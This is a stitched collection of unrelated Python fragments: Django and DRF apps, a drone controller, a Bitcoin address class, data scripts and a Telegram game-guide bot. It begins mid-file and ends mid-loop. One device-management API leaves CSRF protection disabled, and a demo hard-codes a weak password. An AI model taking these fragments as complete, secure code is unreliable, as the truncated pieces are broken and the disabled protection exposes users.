    path('salvados/edit<int:pk>', EditarSalvado.as_view(), name='editar_salvado'),
    path('salvados/delete<int:pk>', BorrarSalvado.as_view(), name='borrar_salvado'),
]
|
import redis

if __name__ == '__main__':
    # Connect to the Redis-compatible server at the fixed host:port.
    client =redis.Redis(host="10.73.11.21", port=10000)
    # Fetch the raw INFO blob and dump it (Python 2 print statement).
    aa=client.execute_command("info")
    print aa
|
from src.CNF import ClauseSet
class Decision:
    """Placeholder for a decision procedure over a CNF clause set."""

    def __init__(self, cs: ClauseSet):
        # No initialisation yet; the clause set is currently unused.
        pass
|
from elasticsearch import Elasticsearch

# Local Elasticsearch instance and the index/type holding the document.
es = Elasticsearch()
host = "localhost"
port = 9200
index = "python"
type = "class1"  # NOTE(review): shadows the `type` builtin
# get the document id separately
# Partial update: set 'mini-version' on the document with a hard-coded id.
es.update(index=index,id="50FeTG0BsY0arHYik7Pa",body={"doc": {"mini-version": 7.2 }})
|
#!/usr/bin/python3
def area(width, height):
    """Return the area of a width x height rectangle."""
    return height * width
def welcome(name):
    """Print a greeting for *name* and return None."""
    print("welcome", name)
# Demo: greet a user and report the area of a 4x5 rectangle.
welcome("Runoob")
w, h = 4, 5
print("width =", w, "height =", h, "area =",area(w, h))
|
#!/usr/bin/env python
# coding=utf-8
"""This is the main module of the project where the algorithm is executed."""
# Standard module metadata (fix: `_author__` was missing a leading underscore).
__author__ = "L. Miguel Vargas F."
__copyright__ = "Copyright 2015, National Polytechnic School, Ecuador"
__credits__ = ["Mani Monajjemi", "Sika Abarca", "Gustavo Scaglia", "Andrés Rosales"]
__license__ = "Noncommercial"
__version__ = "1.0.0"
__maintainer__ = "L. Miguel Vargas F."
__email__ = "lmiguelvargasf@gmail.com"
__status__ = "Development"
from references import *
from position import *
from constants import *
from controller import *
# Module-level controller shared by every helper function below.
controller = ARDroneController()
def save_positions():
    """Dump every recorded trajectory series to its own .txt file."""
    series = ((x_n, "x_n"), (y_n, "y_n"), (z_n, "z_n"),
              (t_n, "t_n"), (psi_ez_n, "psi_ez_n"), (psi_n, "psi_n"))
    for data, name in series:
        save_list_into_txt(data, name)
def print_useful_data(controller, iteration):
    """Log the drone's current speeds, altitude and heading for *iteration*."""
    data = controller.required_navigation_data
    print("Iteration: " + str(iteration))
    print("\tX speed: " + str(data["vx"]))
    print("\tY speed: " + str(data["vy"]))
    print("\tZ position: " + str(data["z"]))
    # re-read the navigation data for psi, exactly as the original did
    print("\tPsi: " + str(math.degrees(controller.required_navigation_data["psi"])))
def print_adjusted_control_actions(v_xy, v_z, omega_psi):
    """Log the control actions after clamping/normalisation."""
    print("Adjusted Control Actions:")
    for tag, value in (("V_XY", v_xy), ("V_Z", v_z), ("OMEGA_PSI", omega_psi)):
        print("\t" + tag + ": " + str(value))
def print_non_adjusted_control_actions(v_xy, v_z, omega_psi):
    """Log the raw (unclamped) control actions."""
    print("Non-Adjusted Control Actions:")
    for tag, value in (("V_XY", v_xy), ("V_Z", v_z), ("OMEGA_PSI", omega_psi)):
        print("\t" + tag + ": " + str(value))
def follow_trajectory():
    """Closed-loop trajectory tracking: one control step per reference sample.

    Integrates the drone's measured velocities to estimate the x/y position,
    computes position and heading control actions, normalises them to the
    actuator ranges and sends them at the sampling period T0.
    """
    sampling_frequency = rospy.Rate(1 / T0)
    for i in range(len(x_ref_n)):
        # elapsed time since the previous step (0 on the first one)
        if controller.last_time is None:
            controller.last_time = rospy.Time.now()
            dt = 0
        else:
            current_time = rospy.Time.now()
            dt = (current_time - controller.last_time).to_sec()
            controller.last_time = current_time
        t_n.append(i * T0)
        # dead-reckon the horizontal position from the measured velocities
        dx = dt * controller.required_navigation_data["vx"]
        dy = dt * controller.required_navigation_data["vy"]
        try:
            x_n.append(x_n[-1] + dx)
            y_n.append(y_n[-1] + dy)
        except IndexError:
            # first sample: no previous position to integrate from
            x_n.append(dx)
            y_n.append(dy)
        z_n.append(controller.required_navigation_data["z"])
        psi_n.append(controller.required_navigation_data["psi"])
        x_control_action = compute_control_action(x_ref_np1[i], x_ref_n[i], x_n[-1], K_V_XY)
        y_control_action = compute_control_action(y_ref_np1[i], y_ref_n[i], y_n[-1], K_V_XY)
        # desired heading points along the commanded horizontal motion
        psi_ez_n.append(math.atan2(y_control_action, x_control_action))
        v_xy = (1 / T0) * (x_control_action * math.cos(psi_ez_n[-1]) + y_control_action * math.sin(psi_ez_n[-1]))
        # normalise each action by its maximum before clamping
        v_xy_adjusted = adjust_control_action(v_xy / V_XY_MAX)
        v_z = (1 / T0) * compute_control_action(z_ref_np1[i], z_ref_n[i], z_n[-1], K_V_Z)
        v_z_adjusted = adjust_control_action(v_z / V_Z_MAX)
        try:
            omega_psi = (1 / T0) * (psi_ez_n[-1] - K_OMEGA_PSI * (psi_ez_n[-2] - psi_n[-2]) - psi_n[-2])
        except IndexError:
            # first sample: no previous heading error available
            omega_psi = (1 / T0) * (psi_ez_n[-1])
        omega_psi_adjusted = adjust_control_action(omega_psi / OMEGA_PSI_MAX)
        print_useful_data(controller, i)
        print_non_adjusted_control_actions(v_xy, v_z, omega_psi)
        print_adjusted_control_actions(v_xy_adjusted, v_z_adjusted, omega_psi_adjusted)
        controller.send_linear_and_angular_velocities([v_xy_adjusted, 0, v_z_adjusted],
                                                      [0, 0, omega_psi_adjusted])
        sampling_frequency.sleep()
if __name__ == "__main__":
    # Flight sequence: reset, trim, take off, track the reference trajectory,
    # land, then persist the recorded data.
    rospy.init_node("controller_node", anonymous=True)
    controller.get_ready()
    controller.send_reset()
    controller.send_flat_trim()
    controller.send_take_off_and_stabilize(7.0)
    print("Start")
    follow_trajectory()
    controller.send_land()
    save_positions()
    print("Done!")
|
# Compound 4.3% annual interest on an initial balance of 100 until year 20
# (19 compounding steps), then print the final balance.
annee = 1
somme = 100
interet = 4.3/100
for annee in range(2, 21):
    somme = somme + somme * interet
print(somme)
|
# -*- coding: utf-8 -*-
# vi: sts=4 et sw=4
from controller import Controller
from jsonrpc.proxy import JSONRPCException
class Address(object):
    '''A Bitcoin address. Bitcoin properties of an address (for example its
    account) may be read and written like normal Python instance attributes
    (foo.account, or foo.account="blah").'''

    def __init__(self, address=None):
        '''Constructor. If address is empty, generate one.

        Raises InvalidBitcoinAddressError when the address fails validation
        (or when the daemon call itself fails).'''
        if address is None:
            address = Controller().getnewaddress()
        try:
            if not Controller().validateaddress(address)['isvalid']:
                raise InvalidBitcoinAddressError(address)
        except JSONRPCException:
            raise InvalidBitcoinAddressError(address)
        self.address = address

    def __str__(self):
        return self.address

    def __getattr__(self, name):
        '''Expose 'account' as a virtual attribute backed by the daemon.'''
        if 'account' == name:
            return Controller().getaccount(self.address)
        # Fix: unknown attributes previously fell through and returned None
        # implicitly; raise AttributeError so hasattr()/getattr() work.
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # 'account' writes go to the daemon; everything else (e.g. the
        # 'address' assignment in __init__) is stored normally.
        if 'account' == name:
            if value is None:
                Controller().setaccount(self.address)
            else:
                Controller().setaccount(self.address, value)
        else:
            object.__setattr__(self, name, value)

    def getReceived(self):
        '''Returns the total amount received on this address.'''
        return Controller().getreceivedbyaddress(self.address)

    def uri(self):
        '''Return an URI for the address, of the form "bitcoin:17E9wnB...".
        At the moment, the URI takes no other argument yet.'''
        return "bitcoin:" + self.address

    def qrCode(self, size=80, level='L', formt=None, asURI=True):
        '''Return the QR code of the address. If `formt` is None, the method
        returns a PIL Image object, otherwise it returns a string containing
        the image in the desired format (e.g. 'PNG').

        The level can be one of 'L', 'M', 'Q' or 'H'.

        If `asURI` is True, encode the address's "bitcoin:" URI, otherwise
        encode the raw address.

        This method needs the qrencode module, and returns None if the
        module is not found.'''
        try:
            from qrencode import encode_scaled, QR_ECLEVEL_L, QR_ECLEVEL_M, \
                QR_ECLEVEL_Q, QR_ECLEVEL_H
        except ImportError:
            return None
        lvl = {'L': QR_ECLEVEL_L, 'M': QR_ECLEVEL_M, 'Q': QR_ECLEVEL_Q,
               'H': QR_ECLEVEL_H}[level]
        if asURI:
            data = self.uri()
        else:
            data = self.address
        im = encode_scaled(data, size, level=lvl)[2]
        if formt is None:
            return im
        # serialize through an in-memory buffer (Python 2 StringIO)
        from StringIO import StringIO
        buf = StringIO()
        im.save(buf, formt)
        result = buf.getvalue()
        buf.close()
        return result
class InvalidBitcoinAddressError(Exception):
    """Raised when a string fails Bitcoin address validation."""
|
from django.db import models
# Create your models here.
#Product
class Product(models.Model):
    """A sellable item belonging to one Category."""
    # 'Category' is referenced by name because it is declared further down.
    category = models.ForeignKey('Category', related_name='products', on_delete=models.CASCADE)
    name = models.CharField(max_length=100)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    stock = models.PositiveIntegerField()
    created_at = models.DateTimeField(auto_now_add=True)
    description = models.TextField(blank=True)
    # blank=True: presumably auto-filled elsewhere (e.g. in save()) -- confirm
    slug = models.SlugField(unique=True, blank=True)

    class Meta:
        ordering = ('name', )
# Category
class Category(models.Model):
    """Grouping for Product rows (reverse accessor: ``products``)."""
    name = models.CharField(max_length=100)
    created_at = models.DateTimeField(auto_now_add=True)
    description = models.TextField(blank=True, max_length=100)
    # blank=True: presumably auto-filled elsewhere (e.g. in save()) -- confirm
    slug = models.SlugField(unique=True, blank=True)

    class Meta:
        ordering = ('name', )
|
import os
import typing
import logging
import textwrap
import configparser
from .logginglib import log_debug
from .logginglib import log_error
from .pylolib import path_like
from .logginglib import get_logger
from .pylolib import human_concat_list
from .pylolib import get_datatype_human_text
from .datatype import Datatype
from .datatype import OptionDatatype
from .abstract_configuration import AbstractConfiguration
class IniConfiguration(AbstractConfiguration):
    """Configuration persisted to an ini file via `configparser`."""

    def __init__(self, file_path: typing.Optional[typing.Union[path_like]] = None) -> None:
        """Create a new abstract configuration.

        Raises
        ------
        FileNotFoundError
            When the file could not be created

        Parameters
        ----------
        file_path : str, pathlib.PurePath, os.PathLike
            The file path (including the extension) to use, if not given the
            `DEFAULT_INI_PATH` form the `config` will be used, parent
            directories are created if they do not exist (and if possible),
            default: None
        """
        # logger has to be present for the file opening but super() will
        # overwrite self._logger, super() cannot be called here because it
        # loads the config which is not possible without the file
        logger = get_logger(self)
        if isinstance(file_path, path_like):
            # fall back to the default path when the parent directory does
            # not exist and cannot be created
            if not os.path.isdir(os.path.dirname(file_path)):
                try:
                    os.makedirs(os.path.dirname(file_path), exist_ok=True)
                except OSError:
                    file_path = None
        if not isinstance(file_path, path_like):
            # local import to avoid a circular import at module load time
            from .config import DEFAULT_INI_PATH
            file_path = DEFAULT_INI_PATH
            log_debug(logger, "Using file path '{}' from config".format(file_path))
            try:
                os.makedirs(os.path.dirname(file_path), exist_ok=True)
            except OSError as e:
                log_error(logger, e)
                raise e
        if os.path.exists(os.path.dirname(file_path)):
            # path of the ini file this configuration is persisted to
            self.file_path = file_path
        else:
            err = FileNotFoundError(("The parent directory '{}' of the ini " +
                                     "file was not found and could not be " +
                                     "created.").format(os.path.dirname(file_path)))
            log_error(logger, err)
            raise err
        super().__init__()
        self._logger = logger

    def loadConfiguration(self) -> None:
        """Load the configuration from the persistant data."""
        log_debug(self._logger, "Loading configuration from ini file '{}'".format(
            self.file_path))
        config = configparser.ConfigParser(interpolation=None)
        config.read(self.file_path)
        for section in config.sections():
            for key in config[section]:
                value = config[section][key]
                # the datatype is optional; fall back to the raw string
                try:
                    datatype = self.getDatatype(section, key)
                except KeyError:
                    datatype = None
                if datatype == bool:
                    # configparser yields strings; accept the usual ini
                    # spellings of booleans
                    if isinstance(value, str):
                        value = value.lower()
                    if value in ["no", "n", "false", "f", "off", "0"]:
                        value = False
                    elif value in ["yes", "y", "true", "t", "on", "1"]:
                        value = True
                    else:
                        value = bool(value)
                elif callable(datatype):
                    value = datatype(value)
                self.setValue(section, key, value)

    def saveConfiguration(self) -> None:
        """Save the configuration to be persistant."""
        # allow_no_value=True lets comment-only "keys" be written below
        config = configparser.ConfigParser(allow_no_value=True,
                                           interpolation=None)
        for group in self.getGroups():
            for key in self.getKeys(group):
                if self.valueExists(group, key):
                    if not group in config:
                        config[group] = {}
                    # prepare the comment: description, type, allowed values
                    # and default, each part optional
                    comment = []
                    try:
                        comment.append(str(self.getDescription(group, key)))
                    except KeyError:
                        pass
                    try:
                        datatype = self.getDatatype(group, key)
                        comment.append("Type: '{}'".format(
                            get_datatype_human_text(datatype)
                        ))
                        if isinstance(datatype, OptionDatatype):
                            comment.append("Allowed values: {}".format(
                                human_concat_list(datatype.options)
                            ))
                    except KeyError:
                        datatype = str
                    try:
                        comment.append("Default: '{}'".format(self.getDefault(group, key)))
                    except KeyError:
                        pass
                    # save the comment: wrapped to 79 columns and stored as a
                    # valueless "; ..." key (hence allow_no_value above)
                    if len(comment) > 0:
                        w = 79
                        c = "; "
                        comment_text = []
                        for l in comment:
                            comment_text += textwrap.wrap(l, w)
                        comment = ("\n" + c).join(comment_text)
                        config[group][c + comment] = None
                    # prepare the value
                    val = self.getValue(group, key, False)
                    if isinstance(val, bool) and val == True:
                        val = "yes"
                    elif isinstance(val, bool) and val == False:
                        val = "no"
                    elif isinstance(datatype, Datatype):
                        val = datatype.format(val)
                    # save the value, adding new line for better looks
                    config[group][key] = str(val) + "\n"
        log_debug(self._logger, "Saving ini configuration to file '{}'".format(
            self.file_path))
        with open(self.file_path, 'w+') as configfile:
            config.write(configfile)
|
import os
import sys
import subprocess
import shutil
import time
import concurrent.futures
import fam
sys.path.insert(0, 'scripts')
sys.path.insert(0, os.path.join("tools", "trees"))
sys.path.insert(0, os.path.join("tools", "msa_edition"))
import saved_metrics
from run_mrbayes import MrbayesInstance
import experiments as exp
def substample_distribution(src, dest, reduce_by):
    """Copy every `reduce_by`-th line of `src` into `dest`.

    Parameters
    ----------
    src : str
        Path of the input distribution file.
    dest : str
        Path of the (overwritten) subsampled output file.
    reduce_by : int
        Keep one line out of every `reduce_by` (lines 0, reduce_by, ...).
    """
    # Use context managers so both handles are closed deterministically
    # (the original leaked the read handle), and stream the input instead
    # of materialising all lines.
    with open(src) as reader, open(dest, "w") as writer:
        for idx, line in enumerate(reader):
            if idx % reduce_by == 0:
                writer.write(line)
def subsample(datadir, gene_trees, reduce_by):
    """Thin every family's gene-tree distribution in *datadir* by *reduce_by*."""
    inst = MrbayesInstance.get_instance(datadir, gene_trees)
    old_tag = inst.get_tag()
    # sampling frequency and burnin shrink together with the distribution,
    # which changes the instance tag
    inst.frequency = inst.frequency / reduce_by
    inst.burnin = inst.burnin / reduce_by
    subst_model = inst.subst_model
    new_tag = inst.get_tag()
    print(new_tag + " -> " + old_tag)
    for family in fam.get_families_list(datadir):
        src = fam.build_gene_tree_path(datadir, subst_model, family, old_tag)
        dst = fam.build_gene_tree_path(datadir, subst_model, family, new_tag)
        substample_distribution(src, dst, reduce_by)
if (__name__== "__main__"):
    # CLI: subsample.py gene_trees reduce_by datadir [datadir ...]
    if len(sys.argv) < 4:
        print("Syntax error: python " + os.path.basename(__file__) + " gene_tree reduce_by (for instance 10) datadir_list")
        print(len(sys.argv))
        sys.exit(0)
    gene_trees = sys.argv[1]
    reduce_by = int(sys.argv[2])
    datadirs = sys.argv[3:]
    for datadir in datadirs:
        print(datadir)
        subsample(datadir, gene_trees, reduce_by)
|
from django.conf.urls.defaults import *
from piston.resource import Resource
from devmgr.api.handlers import *
# TODO: CSRF protection currently disabled...fix this!
# The below is stolen from Taedium, maybe I can use that
"""
class CSRFDisabledResource(Resource):
def __init__(self, **kwargs):
super(self.__class>>, self).__init__(**kwargs)
self.csrf_exempt = getattr(self.handler, 'csrf_exmpt', True)
#Uses Django authentication by default
auth = HttpBasicAuthentication()
"""
#device_handler = CSRFDisabledResource(handler=DeviceHandler, authentication=auth)
# Piston Resource wrappers exposing each REST handler class.
# NOTE(review): CSRF protection is disabled per the TODO above; the
# CSRFDisabledResource variant remains commented out.
device_handler = Resource(DeviceHandler)
device_location_handler = Resource(DeviceLocationHandler)
device_allow_track_handler = Resource(DeviceAllowTrackHandler)
device_wipe_handler= Resource(DeviceWipeHandler)
device_c2dm_register_handler = Resource(DeviceC2DMRegisterHandler)
device_c2dm_send_handler = Resource(C2DMSendHandler)
device_loc_frequency_handler = Resource(LocFrequencyHandler)
# URL table: device registration/CRUD, per-device sub-resources, and
# C2DM push endpoints.
# NOTE(review): `django.conf.urls.defaults` / `patterns()` is the legacy
# Django (<=1.5) URLconf API — confirm the project's Django version.
urlpatterns = patterns('',
(r'^register$', device_handler),
(r'^(?P<device_id>\d+)$', device_handler),
(r'^$', device_handler),
(r'^(?P<device_id>\d+)/location$', device_location_handler),
(r'^(?P<device_id>\d+)/allowtrack$', device_allow_track_handler),
(r'^(?P<device_id>\d+)/wipestatus$', device_wipe_handler),
(r'^c2dm/(?P<device_id>\d+)/register$', device_c2dm_register_handler),
(r'^c2dm/(?P<device_id>\d+)/send$', device_c2dm_send_handler),
(r'^(?P<device_id>\d+)/trackfrequency$', device_loc_frequency_handler),
)
|
from models import User
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import sessionmaker
import traceback
from utils import strToToken
from settings import db_url
def isUserAuthenticated(session, username, password):
    """Check a username/password pair against the User table.

    :param session: SQLAlchemy session used for the lookup
    :param username: login name to look up
    :param password: plaintext password; hashed via strToToken before compare
    :return: the stored password token when authentication succeeds,
             otherwise None
    """
    token = None
    try:
        user = session.query(User).filter(User.username == username).first()
        # Bug fix: an unknown username previously raised AttributeError on
        # `user.password`, which the broad except masked as a DB error.
        if user is None:
            return None
        if strToToken(password) == user.password:
            token = user.password
        return token
    except Exception as e:
        print('Got exception while getting user..')
        print(e)
    return token
# function for returning engine
# function for returning engine
def getEngine(dbUrl):
    """Create a SQLAlchemy engine for the given database URL.

    Bug fix: the parameter was previously ignored and the global `db_url`
    used instead; the only call site passes `db_url`, so behavior there is
    unchanged, but the function now honors its argument.
    """
    return create_engine(dbUrl)
# function for getting session
# function for getting session
def getSession(engine):
    """Return a fresh Session bound to the given engine."""
    factory = sessionmaker(bind=engine)
    return factory()
# fun for creating user
# fun for creating user
def createUser(session, firstName, lastName, username, password):
    """Create and persist a new User; roll the session back on failure."""
    new_user = User(first_name=firstName, last_name=lastName)
    new_user.set_username(username)
    new_user.set_password(password)
    try:
        session.add(new_user)
        session.commit()
        print('user created successfully...')
    except Exception as e:
        print("Got exception while creating user")
        print(e)
        # Leave the session usable for subsequent work.
        session.rollback()
        traceback.print_exc()
def getProductDetails(productsList):
    """Summarize groups of products by their class name.

    :param productsList: iterable of product groups; each group is a sequence
        of objects exposing `.quantity` and `.manufacturer`
    :return: dict keyed by the product class name, each value a dict with
        'name', total 'quantity', and the list of 'manufacturers'
    """
    productsInfo = {}
    # Idiom fix: the old `productsList.__len__()` guard is redundant (the
    # loop handles an empty list) and broke on unsized iterables.
    for products in productsList:
        if not products:
            continue
        quantity = 0
        manufacturers = []
        for product in products:
            quantity += product.quantity
            manufacturers.append(product.manufacturer)
        # As in the original, the group is keyed by the class of its
        # last product.
        product_name = product.__class__.__name__
        productsInfo[product_name] = {
            'name': product_name,
            'quantity': quantity,
            'manufacturers': manufacturers,
        }
    return productsInfo
if __name__ == '__main__':
    # Smoke test: connect to the configured database and create one user.
    engine = getEngine(db_url)
    session = getSession(engine)
    createUser(session, 'John', 'drew', 'john123', '12345678')
|
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# Synthetic 1-feature regression dataset with Gaussian noise; fixed seeds
# keep the split and data reproducible.
X, y = datasets.make_regression(n_samples=100, n_features=1, noise=20, random_state=4)
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state =1234)
print(X_train.shape)
from linear_reg import LinearRegression
#MSE
def mse(y_true, y_predicted):
    """Mean squared error between targets and predictions."""
    diff = y_true - y_predicted
    return np.mean(diff * diff)
# Train gradient-descent linear regression and evaluate on the held-out split.
regression = LinearRegression(lr=0.01, n_iters=1000)
regression.fit(X_train, y_train)
# NOTE(review): `predic` is the method name exposed by linear_reg —
# presumably a misspelling of `predict`; confirm against that module.
predicted = regression.predic(X_test)
print("dd",predicted)
# NOTE(review): this rebinds the name `mse` from the function above to its
# result — the function cannot be called again afterwards.
mse = mse(y_test, predicted)
print(mse)
# Predictions over the full dataset (computed but not plotted below).
y_pred_line = regression.predic(X)
cmap = plt.get_cmap("viridis")
fig = plt.figure(figsize=(8,6))
m1 = plt.scatter(X_train, y_train, color = cmap(0.9), s=10)
m2 = plt.scatter(X_test, y_test, color = cmap(0.5), s=10)
plt.plot(X_test, predicted, color="black", linewidth=2, label="Prediction")
plt.show()
|
from django.shortcuts import render
from django.http import HttpResponse
from rest_framework import viewsets
from .serializers import *
from .models import *
def index(request):
    """Plain-text landing page for the API root."""
    message = "Hello, world. You're at the ProtoRoute index."
    return HttpResponse(message)
class RouteGuideViewSet(viewsets.ModelViewSet):
queryset = RouteGuide.objects.all().order_by('name')
serializer_class = RouteGuideSerializer
class ProvenanceViewSet(viewsets.ModelViewSet):
queryset = Provenance.objects.all().order_by('description')
serializer_class = ProvenanceSerializer
class RouteSegmentGuideViewSet(viewsets.ModelViewSet):
    # NOTE(review): class is named "SegmentGuide" but serves the
    # RouteGuideSegment model/serializer — presumably intentional
    # word-order flip; confirm.
    queryset = RouteGuideSegment.objects.all().order_by('name')
    serializer_class = RouteGuideSegmentSerializer
class RoutePointViewSet(viewsets.ModelViewSet):
queryset = RoutePoint.objects.all().order_by('name')
serializer_class = RoutePointSerializer
class PersonAndOrganizationViewSet(viewsets.ModelViewSet):
queryset = PersonAndOrganization.objects.all().order_by('name')
serializer_class = PersonAndOrganizationSerializer
class TransportNoteViewSet(viewsets.ModelViewSet):
queryset = TransportNote.objects.all().order_by('transport_mode')
serializer_class = TransportNoteSerializer
class MapReferenceViewSet(viewsets.ModelViewSet):
queryset = MapReference.objects.all().order_by('id')
serializer_class = MapReferenceSerializer
class CategoryViewSet(viewsets.ModelViewSet):
queryset = Category.objects.all().order_by('content')
serializer_class = CategorySerializer
class ArticleViewSet(viewsets.ModelViewSet):
queryset = Article.objects.all().order_by('headline')
serializer_class = ArticleSerializer
class GeoPathViewSet(viewsets.ModelViewSet):
queryset = GeoPath.objects.all().order_by('id')
serializer_class = GeoPathSerializer
class MapImageViewSet(viewsets.ModelViewSet):
queryset = MapImage.objects.all().order_by('id')
serializer_class = MapImageSerializer
class VerificationRecordViewSet(viewsets.ModelViewSet):
queryset = VerificationRecord.objects.all().order_by('date_verified')
serializer_class = VerificationRecordSerializer
class ProvenanceViewSet(viewsets.ModelViewSet):
    # NOTE(review): duplicate of the ProvenanceViewSet defined earlier in
    # this module (which orders by 'description'); this later definition
    # rebinds the name, so any router registering ProvenanceViewSet gets
    # this one (ordered by 'id'). One of the two should be removed.
    queryset = Provenance.objects.all().order_by('id')
    serializer_class = ProvenanceSerializer
class AccessibilityDescriptionViewSet(viewsets.ModelViewSet):
queryset = AccessibilityDescription.objects.all().order_by('id')
serializer_class = AccessibilityDescriptionSerializer
class ActivityViewSet(viewsets.ModelViewSet):
queryset = Activity.objects.all().order_by('prefLabel')
serializer_class = ActivitySerializer
class IndicativeDurationViewSet(viewsets.ModelViewSet):
queryset = IndicativeDuration.objects.all().order_by('id')
serializer_class = IndicativeDurationSerializer
class AmenityFeatureViewSet(viewsets.ModelViewSet):
queryset = AmenityFeature.objects.all().order_by('name')
serializer_class = AmenityFeatureSerializer
class GeoCoordinatesViewSet(viewsets.ModelViewSet):
queryset = GeoCoordinates.objects.all().order_by('id')
serializer_class = GeoCoordinatesSerializer
class RoutePointViewSet(viewsets.ModelViewSet):
    # NOTE(review): identical redefinition of RoutePointViewSet from earlier
    # in this module — harmless (same queryset/serializer) but redundant.
    queryset = RoutePoint.objects.all().order_by('name')
    serializer_class = RoutePointSerializer
class RouteGradientViewSet(viewsets.ModelViewSet):
queryset = RouteGradient.objects.all().order_by('id')
serializer_class = RouteGradientSerializer
class RouteDifficultyViewSet(viewsets.ModelViewSet):
queryset = RouteDifficulty.objects.all().order_by('id')
serializer_class = RouteDifficultySerializer
class ImageViewSet(viewsets.ModelViewSet):
queryset = Image.objects.all().order_by('id')
serializer_class = ImageSerializer
class RouteLegalAdvisoryViewSet(viewsets.ModelViewSet):
queryset = RouteLegalAdvisory.objects.all().order_by('id')
serializer_class = RouteLegalAdvisorySerializer
class RouteDesignationViewSet(viewsets.ModelViewSet):
queryset = RouteDesignation.objects.all().order_by('id')
serializer_class = RouteDesignationSerializer
class RouteSegmentGroupViewSet(viewsets.ModelViewSet):
queryset = RouteSegmentGroup.objects.all().order_by('id')
serializer_class = RouteSegmentGroupSerializer
class UserGeneratedContentGroupViewSet(viewsets.ModelViewSet):
    # NOTE(review): despite the "Group" in the name, this serves the plain
    # UserGeneratedContent model — the same queryset/serializer as
    # UserGeneratedContentViewSet below. Looks like a copy-paste; confirm
    # whether a UserGeneratedContentGroup model was intended.
    queryset = UserGeneratedContent.objects.all().order_by('id')
    serializer_class = UserGeneratedContentSerializer
class RouteRiskAdvisoryViewSet(viewsets.ModelViewSet):
queryset = RouteRiskAdvisory.objects.all().order_by('id')
serializer_class = RouteRiskAdvisorySerializer
class KnownRiskViewSet(viewsets.ModelViewSet):
queryset = KnownRisk.objects.all().order_by('id')
serializer_class = KnownRiskSerializer
class RiskModifierViewSet(viewsets.ModelViewSet):
queryset = RiskModifier.objects.all().order_by('id')
serializer_class = RiskModifierSerializer
class RouteAccessRestrictionViewSet(viewsets.ModelViewSet):
queryset = RouteAccessRestriction.objects.all().order_by('id')
serializer_class = RouteAccessRestrictionSerializer
class RouteAccessRestrictionTermViewSet(viewsets.ModelViewSet):
queryset = RouteAccessRestrictionTerm.objects.all().order_by('id')
serializer_class = RouteAccessRestrictionTermSerializer
class RiskMitigatorViewSet(viewsets.ModelViewSet):
queryset = RiskMitigator.objects.all().order_by('id')
serializer_class = RiskMitigatorSerializer
class UserGeneratedContentViewSet(viewsets.ModelViewSet):
queryset = UserGeneratedContent.objects.all().order_by('id')
serializer_class = UserGeneratedContentSerializer
|
from loader import dp
from keyboards.inline.herou1 import hero
from keyboards.inline.pow import power
from keyboards.inline.agi import agility
from keyboards.inline.netral import neutral
from keyboards.inline.intel import intelligence
from keyboards.inline.prost import easy
from keyboards.inline.items import item
from keyboards.inline.sbor import sbor
from keyboards.inline.nz8 import nazad
from keyboards.inline.nz9 import nazad1
from keyboards.inline.nz10 import nazad2
from keyboards.inline.nz11 import nazad3
from keyboards.inline.rz1 import rz1
from keyboards.inline.nz13 import nazad4
from keyboards.inline.rz2 import rz2
from keyboards.inline.nz15 import nazad5
from utils.db_api.db import Database
from keyboards.inline.nz20 import nazad20
from keyboards.inline.nzspr import nazadspr
from keyboards.inline.gid import guide
# --- dispatch tables --------------------------------------------------------
# Menu navigation: callback data -> (prompt text, keyboard to show).
_MENU = {
    "call": ('выбирите атрибут героя', hero),
    "сила": ('выбирите героя', power),
    "ловкость": ('выбирите героя', agility),
    "нейтральные": ('выбирите разряд', neutral),
    "интелект": ('выбирите героя', intelligence),
    "простые": ('выбирите предмет', easy),
    "сборные": ('выбирите предмет', sbor),
    "Разряд 1": ('выбирите предмет', rz1),
    "Разряд 2": ('выбирите предмет', rz2),
    "Назад1": ('выбирите предмет', hero),
    "Назад2": ('выбирите предмет', hero),
    "Назад3": ('выбирите героя', hero),
    "Назад4": ('выбирите предмет', item),
    "Назад5": ('выбирите предмет', item),
    "Назад6": ('выбирите предмет', item),
    "Назад8": ('выбирите предмет', power),
    "Назад9": ('выбирите предмет', agility),
    "Назад10": ('выбирите героя', intelligence),
    "Назад11": ('выбирите предмет', easy),
    "Назад12": ('выбирите предмет', neutral),
    "Назад13": ('выбирите предмет', rz1),
    "Назад14": ('выбирите предмет', neutral),
    "Назад15": ('выбирите предмет', rz2),
    "Назад20": ('выбирите предмет', sbor),
    "Назадспр": ('выбирите предмет', guide),
}

# Strength heroes -> Database.hero_inf2, "back" keyboard nazad.
_STRENGTH_HEROES = (
    "Axe", "SandKing", "Mars", "Earthshaker", "Sven", "Tiny", "Kunkka",
    "Dragon Knight", "Omniknight", "Clockwerk", "Alchemist", "Huskar",
    "Brewmaster", "Treant Protector", "Centaur Warrunner", "Bristleback",
    "Timbersaw", "Tusk", "Elder Titan", "Legion commander", "Earth Spirit",
    "Pudge", "Tidehunter", "Night Stalker", "Phoenix", "Wraith King",
    "Slardar", "Lifestealer", "Chaos Knight", "Undying", "Spirit Breaker",
    "Abaddon", "Doom", "Magnus", "Lycan", "Underlord",
)
# Agility heroes -> Database.hero_inf, "back" keyboard nazad1.
_AGILITY_HEROES = (
    "Anti-mage", "Drow Ranger", "Juggernaut", "Vengeful Spirit",
    "Phantom Lancer", "Morphling", "Riki", "Lone Druid", "Naga Siren",
    "Ursa", "Templar Assassin", "Ember Spirit", "Bounti Hunter", "Sniper",
    "Gyrocopter", "Luna", "Troll Warlord", "Faceless Void",
    "Phantom Assassin", "Razor", "Clinkz", "Shadow Fiend", "Venomancer",
    "Bloodseeker", "Viper", "Nyx Assassin", "Slark", "Weaver", "Spectre",
    "Meepo", "Broodmother", "Medusa", "Terrorblade", "Arc Warden",
    "Monkey King", "Pangolier",
)

# Database lookups: callback data -> (Database method name, "back" keyboard).
# In every case the callback data itself is the lookup key passed to the
# Database method.
_DB_LOOKUPS = {}
for _name in _STRENGTH_HEROES:
    _DB_LOOKUPS[_name] = ('hero_inf2', nazad)
for _name in _AGILITY_HEROES:
    _DB_LOOKUPS[_name] = ('hero_inf', nazad1)
for _name in ("Cristal Maiden", "Puck", "Storm Spirit"):
    _DB_LOOKUPS[_name] = ('hero_inf3', nazad2)
for _name in ("Town Portal Scroll", "Ironwood Branch", "Quelling Blade"):
